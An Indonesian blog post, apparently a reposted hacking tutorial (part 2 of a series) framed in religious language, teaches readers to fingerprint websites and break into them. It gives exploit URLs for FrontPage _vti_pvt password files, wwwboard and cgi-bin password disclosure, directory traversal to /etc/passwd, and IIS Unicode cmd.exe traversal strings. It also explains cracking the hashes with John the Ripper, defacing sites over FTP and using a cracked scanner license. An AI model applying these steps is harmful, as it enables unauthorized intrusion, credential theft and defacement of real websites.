Belajar Hacker A-Z Part 2 (langkah-langkah)

LANGKAH MELAKUKAN HACKING
irhaby007
(lanjutan dari Part 1)
Akhi karim… sebelum kita melanjutkan pembahasan ini secara lebih dalam, Antum harus catat bahwa langkah nge-hack yang akan kami jelaskan berikut ini hanya satu dari sekian cara yang banyak, dan bisa jadi langkah ini sudah tidak up to date.

Tapi yang penting, yang harus Antum ketahui di sini adalah, bagaimana sih melakukan hack secara umum? Bagaimana Antum tahu cara mencari bugs dari sistem-sistem,
kemudian bagaimana cara memanfaatkan bugs tersebut. Dengan mengetahuinya, atas pertolongan Alloh akan membantu maksud mulia kita.

Langkah pertama dalam hacking adalah mengumpulkan data. Artinya, dalam suatu situs, kita harus tahu web servernya, sistem operasinya apa, dan program bantu apa saja yang dipakai. Misalnya, kita sekarang menghadapi sebuah situs. Nah, kemudian, bagaimana caranya agar kita bisa mengetahui sistem operasinya, web server nya, program bantunya, dan semua data tentang situs tersebut.

Untuk mengetahui semua ini, bisa kita masukkan nama situs yang kita maksud pada salah
satu website di bawah ini. Website-website ini akan memberikan data ringkas kepada kita
tentang sistem operasi yang digunakan situs tersebut, web servernya, dan lain sebagainya.

Website-website itu adalah: http://www.netcraft.net/ Dan http://www.whois.com/
Catatan penting:
Jangan mengetikkan http:// atau tanda / yang ada di akhir alamat URL, ketika Antum mengetik alamat website di atas.

Antum juga bisa mendapatkan data-data tentang sebuah situs dengan cara mencoba memasuki situs tersebut melalui program Tel Net.

a. Contoh situs pengguna IIS sebagai web server

Kalau kita memasukkan nama sebuah situs pada website netcraft, akan muncul data-data berikut:
This site http://www.***.com is running
Microsoft-Windows 2000 on IIS/5.0

Ok…dari sini, kita mendapatkan dua data penting. Pertama, situs ini menggunakan ISS 5.0 sebagai web server.
Kedua, sistem operasi yang dipakai adalah windows 2000.

Langkah yang harus dilakukan berikutnya adalah:
1. Kita coba untuk mencari bugs yang ada pada IIS 5.0 pada situs ini. Ok,sekarang, ada satu hal lagi yang harus dikuasai, yaitu masalah Unicode. Dengan Unicode, sebuah situs bisa diserang melalui explorer-nya, hanya saja Unicode tidak berfungsi untuk selain web server ISS. Unicode adalah alamat panjang yang dituliskan di bagian belakang, setelah menulis alamat sebuah situs.
2. Kalau tidak ketemu juga bugs nya, kita coba untuk mencari bugs dari Windows 2000. Ok, sementara kita anggap langkah ini pun tak membuahkan hasil. Jadi…?
3. Lihatlah isi situs tersebut, barangkali di sana ada menu login sebagai pengunjung, atau menu forum (muntada dalam bahasa arabnya), atau yang semisal…

(Ini adalah contoh dalam memilih cara menyerang situs, yaitu dengan berdasarkan data sebuah situs kita berusaha mencari bugs yang bisa dimasuki untuk menyerang situs tersebut, dengan bantuan Alloh tentunya.

b. Contoh situs pengguna Apache sebagai web server

Kita ambil contoh situs:

http://www.arank.com/

Kalau situs ini kita kupas dengan situs netcraft, hasilnya adalah:
The site http://www.arank.com/is running
Apache/1.3.20 (UNIX) mod_gzip/1.3.19.1a
mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510
mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

Ada tiga hal penting buat kita pada data di atas:
1. Web servernya adalah Apache 1.3.20
Pertama yang harus kita ingat, Apache adalah web server yang sulit diserang (tapi bukan mustahil lho…), kecuali beberapa versi saja yang agak mudah. Ok, sementara kita lewati dulu pencarian bugs pada web server Apache.
2. Situs ini ternyata menggunakan program bantu Front Page /5.0.2.2510. Na…untuk program ini banyak sekali celahnya.
3. Sistem operasi yang dipakai adalah Linux. Menyerang sistem Linux boleh dikata paling sulit daripada sistem operasi lain. Wallôhu A‘lam

Baiklah, sekarang akan coba kita jabarkan kelemahan-kelemahan yang ada pada program
Front Page.

Seperti sudah kami katakan, program ini banyak sekali memiliki kelemahan. Kelemahannya di samping banyak juga besar, kira-kira begitu lah… Di antara kelemahan itu adalah folder _vti_pvt dan private. Inilah bagian yang akan kita serang, karena untuk folder lain biasanya tidak terlalu berguna. Dalam dua folder ini, akan kita temukan empat file penting, yaitu:
1) service.pwd
2) users.pwd
3) authors.pwd
4) administrators.pwd

Ini adalah file paling bahaya, kalau lah kita hanya bisa mendownload satu dari empat file ini, (ingat, celah seperti ini ada pada 70% situs-situs yang tersebar di dunia maya), kemudian kita buka file itu dengan mafkarah, akan kita lihat hasil berikut:
Goodyco: CalXS8USI4TGM

Ini kita ambil dari sebuah situs tertentu…

http://www.***.com/_vti_pvt/service.pwd

Dari sini kita ketahui, Goodyco adalah usernya, sedangkan password yang masih tersandi itu adalah CalXS8USI4TGM. Selanjutnya, bagaimana memecahkan kode password ini?

Kita akan memecahkan kode password ini melalui program Jhon The Ripper (penjelasan tentang penggunaan program ini ada di akhir pembahasan, Insyâ Allôh)

Sekarang kita beralih kepada bagian ketiga yaitu sistem operasi yang digunakan. Seperti kita ketahui dari data di atas, sistem operasi yang dipakai situs itu adalah Linux. Tapi, linux yang versi apa? Ada linux Red hat, ada Mandrix, dan banyak lagi versi lain, dan bugs nya pun juga lebih banyak lagi. Tetapi, yang jelas pada saat seperti ini Antum akan menghadapi dua masalah.

Pertama, bagaimana mengetahui jenis sistem operasinya?
Antum bisa mengambil informasi tentang sistem operasi yang dipakai melalui program Tel Net. Caranya, tulis alamat URL situs, nanti akan muncul data tentang sistem operasinya: jenisnya, versinya, dst.

Masalah kedua, Antum mesti punya sistem Linux, sebab bugs yang ada menggunakan bahasa C, padahal bahasa C hanya bisa dipakai dalam sistem operasi Linux saja.

Kesimpulan:
Dari penjabaran di atas, nampak bahwa aksi hacking itu terdiri dari dua bagian: pertama, mengumpulkan data tentang situs yang menjadi target, kemudian kedua melakukan serangan ke situs itu berdasarkan data yang didapat.

Pada keterangan tadi, kita telah menyelesaikan urusan mengumpulkan data. Sekarang, bagaimana cara melakukan serangan kepada target, berdasarkan data yang sudah
dikumpulkan. Ada beberapa situs, yang menampilkan bugs-bugs dari web server, sistem operasi, dsb, secara berkala dan up to date. Inti tugas kita selanjutnya adalah, mempelajari bugs-bugs itu, lalu memanfaatkannya secara benar, dengan pertolongan Alloh tentunya.

Situs yang menyediakan jasa penampilan bugs ini, di antaranya adalah: http://www.ussbrack.com/

Situs ini sangat-sangat penting. Setelah membukanya, cari menu Exploits yang ada di bagian kiri tampilan, lalu klik pilihan pertama. Di sini akan Antum temukan semua bugs pada semua sistem operasi, sejak dari Linux, Windows, dll; jenisnya pun bermacam-macam, ada bahasa C, Perl, Unicode, dsb.

Ada situs lain yang semisal, yaitu: http://www.neworder.box.sk
Situs ini sangat membantu sekali. Sekedar contoh, coba Antum tulis pada kotak yang ada pada bagian kiri situs ini: IIS, atau: Apache, atau nama forum sebauh situs dan nama yang mengeluarkannya, atau program apa saja yang menurut Antum terlihat ada celah kelemahannya.

Situs-situs penyedia Archive berisi bermacam-macam bugs:
http://www.securiteam.com/exploits/archive.html
http://www.ussrback.com
http://www.secureroot.com

http://www.rootshell.com

http://www.secureroot.com/category/exploits
Ada juga program yang fungsinya adalah mencari bugs pada suatu situs, lalu menyuguhkannya kepada Antum dalam “nampan emas” (saking mudahnya kali…penerj.), program ini adalah program terbaik untuk mencari bugs, semoga Alloh selalu menjadikan maksud tujuan kita sempurna untuk meraih semua kebaikan yang Dia ridhoi.

1. Program Shadow Security Scanner
Untuk mendown load program ini, Antum bisa meng-klik link berikut ini (juga tutorial tentang program crack): http://mirror1.safety-lab.com/SSS.exe
Untuk download program crack: http://www.aldamar.net/index_files/license.zip
Untuk download program transfer ke dalam bahasa arab: http://www.aldamar.net/index_files/ssslanguage.zip
Untuk download link penjelasan tutorial program ini, klik: http://www.aldamar.net/index_files/ssslanguage.zip

Program ini sangat populer dan memiliki kecepatan tinggi dalam mencari celah dan bugs suatu situs. Setelah di download, lakukan penginstalan dan pengoperasikan program. Antum akan diminta updating, klik saja Yes. Setelah itu, matikan program ini. Tugas utama Antum adalah membuat file License.key dari hasil cracking, setelah itu meletakkan file ini dalam program. Setelah itu, jalankan kembali program, maka file akan terbuka. Kemudian, Antum akan ditanya,
“Apakah Anda mau Mendaftar?” jawab dengan mengklik button Done. Penjelasan seputar program, sudah ada di dalam link di atas, Alhamdulillah…

2. Program CGI Scanner
Ini adalah program khusus yang mencari bugs CGI. Program ini adalah yang terbaik untuk mencari bugs ini, wallôhu A‘lam… program ini –alhamdulillah— juga sudah ada di daftar link di atas.

3. Program Uni Scan
Antum bisa mendapatkan program ini pada link berikut: http://online.securityfocus.com/data/tools/uniscan.zip
Program ini sama dengan dua program sebelumnya, hanya saja program ini khusus mencari bugs Unicode.

Sampai di sini kita telah mengetahui cara mencari bugs (celah, titik lemah) pada sebuah situs.
Langkah berikutnya adalah, bagaimana memanfaatkan bugs yang sudah kita temukan.

Cara menembus bugs:

a. Posisi penembusan bugs:
http://www.xxxxx.com/scripts/..&Aa….exe?/c+dir+c:\ yaitu, setelah alamat utama URL (setelah penulisan .com). Mungkin akan ada yang bertanya, Apanya yang kelihatan? Dan bentuknya kayak apa? Jawabannya sederhana saja, kalau hal ini Antum tulis di DOS, akan muncul file-file DIR. Nah, cara menampakkan file-file pada explorer, kira-kira sama dengan cara dalam DOS. Wallôhu A‘lam…

b. Penjelasan tentang berbagai macam bugs dan cara memanfaatkannya:

1. Penjelasan tentang bugs pada Front Page dan cara memanfaatkannya:

Bugs Front Page adalah bugs yang banyak sekali tersebar di situs-situs yang ada. Biasanya, bentuknya adalah sebagai berikut: www.***.com/_vti_pvt
Maka, yang dimaksud di sini, bugs nya adalah _vti_pvt. Dari sini nanti, akan terlihat di depan Antum file-file Front Page dalam situs dan nama operatornya.

Catatan penting:
Bugs ini hanya bisa ditembus dan hanya ada pada situs yang menggunakan Front Page, dan tidak cocok untuk selain ini. Sehingga, Antum harus tahu lebih dahulu apakah situs itu memakai Front Page atau tidak, dengan masuk ke situs: http://www.netcraft.net

Setelah masuk, ada kotak segi panjang di hadapan Antum. Nah, masukkan nama situs yang akan Antum cari data tentangnya. Yang penting bagi kita hanya satu file saja, yang lain biasanya tidak terlalu penting, file itu adalah: sercive.pwd

Kalau kita buka dengan explorer, akan kita lihat pass wordnya masih samar (dalam bentuk kode). Jadi bentuk adalah sebagai berikut:
-FrontPage-
Ekendall: bYld1Sr73NLKo
Louisa: 5zm94d7cdDFiQ

Di sini kita lihat, situs itu memakai dua operator, yaitu Ekandall dan Louisa. Tentu, kedua kode di atas akan kita pecahkan dengan program Jhon The Ripper. Setelah berhasil memecahkan kode Password, kita buka kembali Front Page, lalu klik: File �� Open Web. Lalu, tulislah alamat situs itu, maka akan segera muncul tampilan utamanya (home). Sekarang, silahkan rubah apa yang Antum mau rubah, dan setelah itu jangan lupa Save or publish.

Setelah itu, Antum akan diminta mengisi user name dan password, ini mudah Insyâ Alloh. Tulis saja user name dan passwordnya seperti biasa, lalu klik sign.

Situs di bawah ini, akan kita coba sebagai percobaan, dengan bantuan Alloh:
http://www.heyerl st.org/garderobe/_vt _pvt (silahkan coba ya… –penerj.)

2. Penjelasan tentang bugs WWWBoard

Ini adalah bugs yang paling mudah pada Front Page. Taruhlah situs yang akan kita serang adalah http://www.boardprep.net/ (Sekali lagi ini sekedar contoh), dan Antum lihat di belakangnya belum ada bugs nya. Sekarang, kita tambahkan di belakangnya: wwwboard/passwd.txt

Sehingga, alamat URL nya menjadi: http://www.boardprep.net/wwwboard/passwd.txt
Ketika Antum buka alamat URL di atas, akan muncul: Cknouse: aexMVWnDOyrdE
Artinya, user namenya adalah cknouse, sedangkan kode passwordnya adalah: aexMVWnDOyrdE

Pecahkan sandi di atas dengan program Jhon The Ripper. Ok, sekarang Antum sudah punya user namenya dan sekaligus kode passwordnya. Lalu, apa langkah berikutnya? Bagaimana cara mengubah tampilan utama situs?

Sekarang, kita buka program FTP, setelah itu ketikkan: ftp.domen.com. Perhatikan, kata domen.com gantilah dengan alamat situs yang sudah Antum pegang user name dan passwordnya. Setelah itu, silahkan isi username dan passwordnya, dan masukklah ke dalam situs. Selanjutnya, buatlah satu tampilan baru dan beri nama file: index.html, setelah itu
silahkan di upload ke situs.

Untuk mendownload program FTP, klik link di bawah ini: http://members.home.nl/patrick.pagina/temp/Ws-ftp32. zip

3. Penjelasan tentang CGI Bugs dan cara memanfaatkannya:

Ada bugs-bugs yang langsung bisa diaplikasikan melalui explorer, seperti Unicode, dan beberapa bugs pada CGI. Hanya saja, sebagian –atau mungkin sebagian besar—bugs yang diaplikasikan lewat explorer, hanya dapat dipastikan keberadaannya melalui explorer.
Bugs-bugs yang bisa dimanfaatkan langsung dari explorer contohnya adalah: /cgi-bin/passwd.txt

Kalau situsnya adalah: http://www.suatusitus.com, maka pada explorer Antum tulis begini: http://www.sebuahsitus.com/cgi-bin/passwd.txt

Selanjutnya, bugs ini akan menampilkan buat Antum user name dan password-password yang digunakan oleh para pengguna situs. Seperti pimpinan redaksi, serta siapa saja yang diperbolehkan masuk ke dalam gudang data situs itu.

Tentu saja, jangan sekali-kali Antum coba menggunakan bugs ini sekarang, kecuali kalau Antum ingin menyerang situs di Zimbabwe, yang oleh pengelolanya sudah ditelantarkan sejak 10 tahun lalu. Bugs ini mungkin sudah tidak lagi cocok untuk situs tersebut, karena sudah sangat populer.
Khusus untuk mengambil kelemahan dari file-file CGI & Perl sehingga kita bisa sampai kepada .etc/passwd, maka kita akan mengambil bugs jenis Show Files. Ketika file /cgi-bin/apexec.pl? dan password, maka kita harus menggunakan bugs ini untuk bisa sampai kepada:
http://www.target.com/cgibin/ apexe…te=../../../../../../../../../etc/resolv.conf.html&pa ssurl=/category/

dengan mengganti phat nya sesuai dengan nama file yang diinginkan. Ini untuk Perl. Hal yang sama juga berlaku pada CGI (/cgi-bin/hsx.cgi?) ketika file ini ditemukan di /cgi-bin/
Silahkan Antum coba bugs berikut ini:
http://www.Target.com/cgi-bin/hs .c…./etc/passwd

Cara paling baik untuk mendapatkan file ini adalah dengan memakai metode acak, atau dengan menggunakan program Scan sehingga bugs-bugs yang ada pada situs bisa dideteksi.
Letakkan file-file itu pada kolom bugs, seperti /cgi-bin/hsx.cgi, ketika itu ditemukan, bugs sudah bisa digunakan, dengan bantuan Alloh.

4. Penjelasan tentang Bugs IIS dan cara memanfaatkannya:

IIS adalah Internet Information Service
Biasanya kita menggunakan bugs-nya dengan program Unicode’s, dan itu jenisnya banyak sekali, di antaranya:
http://www.xxx.com/scripts/..&Aacu…d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra…d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra…d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Agra…d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Aacu…d.exe?/:c+dir+c http://www.xxx.com/scripts/..&Aacu…d.exe?/:c+d r+c http://www.xxx.com/scripts/..&Aacu…/cmd.exe?/c+dir +c: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/sy stem32/cmd.exe?/c+dir+c: /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe ?/c+dir+c:
Bersambung ke Part 3

About these ads

10 Tanggapan

  1. keren om..ini yg wa cari2…ada ym gak…bimbing wa melakukannya…ya walaupun cara jadul tp wa seperti mendapatkan emas…ya walaupun programing ku blm sempurna…ya namanya newbie abis

  2. brother kasih caranya make Ubuntu dumz…..masak hari gini masih pke WIN$……yya brother

  3. ini punyaknya irhadi 007 ya?

  4. artikel ini yang nulis adalah seorang Hacker bernama irhaby 007….saya juga punya nih…..

  5. It is perfect time to make some plans for the future and it is
    time to be happy. I’ve read this post and if I could I desire to suggest you few interesting things or advice. Perhaps you could write next articles referring to this article. I want to read more things about it!

  6. percis kaya tutor’ya irhabi 007

Berikan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

%d blogger menyukai ini: